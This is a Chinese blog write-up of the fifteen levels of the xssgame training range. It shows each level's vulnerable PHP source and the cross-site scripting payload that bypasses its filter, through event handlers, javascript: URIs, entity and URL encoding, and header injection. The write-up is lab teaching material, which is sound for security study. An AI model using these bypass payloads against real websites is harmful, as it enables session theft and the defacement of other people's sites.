xssgame靶场通关记录

最新推荐文章于 2024-07-13 21:44:32 发布
最新推荐文章于 2024-07-13 21:44:32 发布
阅读量547 收藏 4
点赞数 1
分类专栏: XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43936524/article/details/113594963
版权

文章目录

靶场地址

国光老师修改以后的项目地址
解压后放入HTTP服务的目录下,浏览器打开。

第一关

没有任何防护
payload:

<script>alert('xss')</script>

第二关

测试语句:

<>"JavAScriPT'/:on;

查看网页源码:
没有找到和&lt;&gt;&quot;JavAScriPT'/:on;相关的结果.
输入的字符串经过htmlspecialchars($str)编码,< > "被转义为html实体.
输出的位置在< h2 >标签内容 以及 input标签的value属性中

php文件中回显到页面的方法是:

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>

h2 标签进行实体转义后没有方法构造html标签和script执行环节
input中可用 " 闭合结合事件响应进行弹窗.

payload:

" onclick=alert('xss')>

拼接后的网页源码

<input name=keyword  value="" οnclick=alert('xss')> ">

点击input输入框即可弹窗

第三关

与第二关基本相同
php源码:

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>

用 ’ 闭合input中回显的字符串,构造事件响应弹窗.
payload

' οnclick=alert('XSS') //

拼接后的网页源码;

<input name=keyword  value='' οnclick=alert('XSS') //'>

第四关

测试语句
<>"JavAScriPT’/:on
查看网页源码

<h2 align=center>没有找到和&lt;&gt;&quot;JavAScriPT'/:on相关的结果.</h2><center>
<form action=level4.php method=GET>
<input name=keyword  value=""JavAScriPT'/:on">

回显位置:

  1. h2标签内
  2. input value属性中
    input中 < > 符号被过滤

payload

" onclick=alert('xss') //

拼接后的网页源码:

<input name=keyword  value="" οnclick=alert('xss') //">

第五关

测试语句

<script>alert(1)</script>

回显结果:
在这里插入图片描述
过滤机制:
script – scr_ipt
on – o_n
考虑用javascript:代替script和on事件来执行弹窗

payload:

"><a href=javascript:alert('xss')>123</a> \\

在这里插入图片描述
点击123弹窗。

第六关

测试语句:

javascript<>on'href

回显结果:
在这里插入图片描述
过滤机制:
on – o_n
href – hr_ef
< script > – < scr_ipt >
本题没有进行大小写过滤
payload:
" 闭合input的value属性后 构造script标签弹窗

"><sCript>alert('xss')</scRipt>\\

第七关

网页源码:

<?php 
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>

可以看出将敏感字符替换为空,可以采用嵌套的方式绕过。
payload:

" oonnclick=alert('XSS') //构造事件
"> <sscriptcript>alert('XSS')</sscriptcript> //构造标签

第八关(*html编码绕过)

测试语句:

<script>alert(xss)</script>

页面源代码:

<form action=level8.php method=GET>
<input name=keyword  value="&lt;script&gt;alert(xss)&lt;/script&gt;">
<input type=submit name=submit value=添加友情链接 />
</form>
</center><center><BR><a href="<scr_ipt>alert(xss)</scr_ipt>">友情链接</a></center><center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/d2d2080f-746c-4276-9f63-585fc4fd4a9c.jpg" width="20%"></center>
<h3 align=center>payload的长度:29</h3></body>
</html>

发现input和a标签均有回显
input标签处<>被转移为html实体,a标签中script变为scr_ipt
经过尝试 a和input标签均会转义" 无法闭合

php源码

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
 echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
?>
  • input标签经过htmlspecialchars转换后很难构造
  • a标签因为输出在href属性中可以考虑javascript:这种形式绕过
    利用当作字符串处理的特点,可以直接将我们的payload HTML使用HTML实体字符编码绕过
    t html实体编码后 &#116;

payload:

javascrip&#116;:alert('XSS')  //将t编码
javascrip&#x09;t:alert('XSS') //tab编码
javascrip&#x0a;t:alert('XSS') //回车编码

第九关(href属性js伪协议)

查看源码

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}
?>

比第八关增加了http检测,只要在payload后加入http
payload:

javascrip&#x74;:alert('XSS') //http://

第十关

php源码

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

h2标签中的回显被htmlspecialchars转义无法构造
input标签t_sort中可以利用 " 闭合后通过构造事件来弹窗

payload:

t_sort=" onclick=alert('xss')>//

在这里插入图片描述
更改input的属性后点击可调转到下一关

第十一关

php源码

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

用htmlspecialchars转义的两处回显无法构造
t_ref处的字符串来源于HTTP_REFERER故更改请求包中的http referer来构造payload

payload:

Referer: " type="" onclick=alert('XSS') //

在这里插入图片描述

第十二关

与十一关相同,user-agent字符串被回显。

payload:

User-Agent: " type="" onclick=alert('XSS') //

第十三关

与十一关相同,cookie字符串被回显。

payload:

Cookie: user=" type="" onclick=alert('XSS') //

第十四关(Angular JS)

php源码

<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.2.0/angular.min.js"></script>

<?php 
ini_set("display_errors", 0);
$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
?>

这题考察Angular JSng-include用法.

ng-include 指令用于包含外部的 HTML 文件,包含的内容将作为指定元素的子节点。ng-include 属性的值可以是一个表达式,返回一个文件名。默认情况下,包含的文件需要包含在同一个域名下。所以这里就用来包含其他关的页面来触发弹窗。
payload:

level14.php?src="level1.php?name=<img src=x οnerrοr=alert('XSS')>"

第十五关(url编码)

php源码

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","&nbsp;",$str);
$str3=str_replace(" ","&nbsp;",$str2);
$str4=str_replace("/","&nbsp;",$str3);
$str5=str_replace("    ","&nbsp;",$str4);
echo "<center>".$str5."</center>";
?>

发现页面回显位置在center标签中,而且没有过滤<>可自己构造标签
又因为空格被过滤,考虑编码绕过

payload

<img%Asrc=0%Aonerror=alert('xss')>
url编码符号
%0a换行
%0dTab

在这里插入图片描述

kit_1
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶场通关-XSS挑战之旅(1-5)
m0_56634355的博客
06-04 1423
直接使用在线靶场网址:https://xss.angelo.org.cn本地搭建xss靶场,这个简单百度吧点击图片后,进入下图:我们可以看到用于js弹窗的代码顺利执行了 看看源码,分析一下 接下来去服务器端看看这一关的源码......
XSS-labs靶场通关
Fly_Mojito的博客
06-06 811
XSS-labs靶场通关
新手打 XSS-level(1-13) 靶场心得和总结
最新发布
m0_73992753的博客
07-13 750
新手学习 XSS-level(1-13)练级
xss-labs靶场通关
m0_52051132的博客
10-15 1617
在这里关于 如何搭建靶场的就不再赘述了,可以在本地用phpstudy来搭建的。建议使用火狐浏 览器,访问http://ip/xss-labs点击图片开始你的xss之旅吧!
XSS靶场通关详解(1-18关)
cz020907020808的博客
06-07 2181
家人们,因为xss靶场比较简单,有些地方说的比较笼统,过关很容易,只需要多尝试就可以,但是学好就难了!
xss-labs靶场实战全通关详细过程(xss靶场详解)
热门推荐
金 帛的博客
07-13 3万+
xss靶场一到二十关通关详细教程
xss-labs靶场通关
10-13
xss-labs靶场通关 本篇文章将对xss-labs靶场的六关源码进行详细的分析和总结,并对每一关的xss攻击payload进行解释。 第一关 xss-labs靶场的第一关源码没有做任何过滤,直接上xss payload:<script>alert("XSS")...
sql和xss靶场资料包.zip
12-21
bWAPP latest.zip DVWA-master.zip pikachu-master.zip sqli-labs-master.zip upload-labs-master-21.zip xss闯关小游戏.Zip xxe-lab-masteri靶场.rar PhpStudy20180211.zip vc9x86(必装).eXe vc11 x86.exe
xssgame.zip
06-10
在这个“xssgame.zip”压缩包中,我们有一个名为“xss小游戏靶场”的练习平台,旨在帮助用户了解和学习如何防范XSS攻击。这个靶场可能包含了多个级别,每个级别代表了不同类型的XSS漏洞,比如反射型XSS、存储型XSS和...
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu靶场通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
xss闯关小游戏.zip
02-25
这是一款利用xss漏洞闯关的小游戏,无需连接数据库,共20关,非常适合网络安全攻防的初学者练习使用,使用及安装教程请看此链接,https://editor.csdn.net/md?articleId=104496122 欢迎各位小伙伴下载
XSS靶场通关
ANYOUZHEN的博客
05-20 1798
leve1 反射型xss,将name后面的值test改为 <script>alert('xss')</script> level2 查看后端代码 得先将前面闭合 ,并且用//将后面的代码注释掉 左边的">去闭合原先的",右边的//去注释原先的"> "><script>alert('xss')</script>// level3 输入test进行尝试,发现没有成功,观察后端代码 猜测服务器端在这两处都用
XSS靶场过关
m0_51581045的博客
03-27 5288
忘记把以前XSS靶场的笔记贴上来了,今天补一下
XSS漏洞:xss-labs靶场通关
qq_68163788的博客
01-16 2623
xss-lab是一个旨在帮助安全研究人员、开发人员和安全爱好者学习和理解跨站脚本攻击(XSS)的项目。它通常包括一系列设计精良的实验室环境,用于模拟真实世界中可能遇到的XSS漏洞场景。这些实验室环境通常包括各种不同类型和难度级别的XSS漏洞,以帮助学习者逐步提高他们的技能。 通过xss-lab项目,用户可以学习如何利用XSS漏洞来攻击网站、窃取用户信息、执行恶意代码等。同时,用户也可以学习如何防御和修复这些漏洞,从而提高网站的安全性。 xss-lab项目的目的是通过实践操作的方式来加深对XSS攻击的理解
xss-labs靶场通关详解
rev1ve的博客
08-30 1461
xss-labs通关详解1-20关
xss-lab靶场通关writeup(1~6.......在更新)
weixin_45694388的博客
09-04 367
level 2 : 标签被编码,利用属性完成弹窗 输入 发现没有弹窗 查看源代码: 发现: <>符号被编码 说明keybord参数进行了处理,那么只能从属性上进行恶意编码:先将属性的引号和标签闭合,用 // 将后面的 “> 注释掉 显示如下 再次查看源码: level 3 : 标签被编码,使用 on 事件完成弹窗 先用test测试,查看源码 同level 2,使用keyword参数 script标签,查看源码得: 发现标签被编码,这时候可以采用特殊的 on 事件来执
【网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
m0_67844671的博客
10-21 5193
【网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
xss靶场通关1~5
m0_52923241的博客
03-23 279
less~1 查看源代码 由于不知道有无过滤,直接给name赋一个简单的弹窗 弹窗成功! less~2 查看源代码 可以看出value的值有">过滤,不能直接赋一个简单的弹窗 我们尝试用">去闭合value的值,输入">οnclick=“alert(1) 此时查看源代码 value=”" value值为空 οnclick=“alert(1)”> 点击就会触发xss less~3 查看源代码 与less~1的区别是这一关是’>闭合 我们尝试用’>闭合,输
xssgame靶场搭建
05-17
XSS Game是一个由Google提供的在线Web安全学习平台,旨在帮助开发人员学习和了解如何识别和利用Web应用程序中的跨站点脚本(XSS)漏洞。它提供了一系列有趣且互动的挑战,以帮助用户了解XSS漏洞的工作原理,从而提高他们在Web应用程序安全方面的技能。 如果你想自己搭建XSS Game靶场,你需要做以下几步: 1. 下载XSS Game靶场代码 你可以在GitHub上下载XSS Game靶场的源代码:https://github.com/google/security-research-pocs/tree/master/web-platform/xss-game 2. 安装和配置Web服务器 你需要安装和配置Web服务器来托管XSS Game靶场。你可以选择Apache、Nginx等常见的Web服务器。 3. 将XSS Game靶场代码放到Web服务器目录下 将下载的XSS Game靶场代码放到Web服务器的根目录下,确保它们可以通过浏览器访问。 4. 配置数据库 XSS Game靶场使用数据库存储用户信息和挑战进度等信息。你需要安装和配置MySQL数据库,并将配置信息添加到XSS Game靶场代码中。 5. 启动Web服务器 启动Web服务器并打开浏览器,访问XSS Game靶场网址即可开始挑战。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值